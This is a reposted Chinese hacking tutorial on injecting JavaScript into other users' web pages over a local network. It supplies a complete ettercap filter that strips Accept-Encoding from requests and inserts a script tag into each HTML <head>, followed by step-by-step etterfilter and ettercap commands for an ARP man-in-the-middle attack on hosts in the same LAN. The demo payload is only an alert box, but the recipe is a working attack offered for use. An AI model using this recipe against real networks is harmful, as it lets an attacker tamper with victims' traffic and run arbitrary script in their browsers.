路由攻击之javascript注入
Posted kali黑客教学
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了路由攻击之javascript注入相关的知识,希望对你有一定的参考价值。
所需工具
1.kali linux2.0
2.js脚本代码
复制下面代码,在记事本中另存为alert.filter(文件保存类型为所有文件)
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
#msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("<head>", "<head><script type="text/javascript">alert('你好美女');</script>");
replace("<HEAD>", "<HEAD><script type="text/javascript">alert('你好美女');</script>");
msg("注入成功!!\n");
}
将文件载入kali linux中
分别执行下面命令
1. cd /root/桌面 //载入桌面
2.ls //查看桌面文件
3. etterfilter alert.feiter -o 11.ef //将alert.feiter编码为可执行的11.ef
(alert.feiter和11.ef文件名可自定义)
完成后桌面会生成11.ef文件
4.命令ettercap -G运行程序
5.现在对ettercap进行设置
这里选择网卡
(注意:攻击的主机必须和你在同一局域网内)
开始扫描主机列表
加入攻击(按照顺序走1-2-3-4不要乱哦
)
效果:
选择中间人攻击
勾选
载入刚才生成的11.ef文件
有错误提示不要理会
开始攻击
效果
在linux中由于编码问题,在输入汉字的时候会乱码,我尝试着对js脚本进行了编码处理,但还是显示乱码,所有有能解决这一问题的,和我联系共同讨论。(QQ;914101530)
以上是关于路由攻击之javascript注入的主要内容,如果未能解决你的问题,请参考以下文章
为啥这种 javascript 注入攻击不起作用? [复制]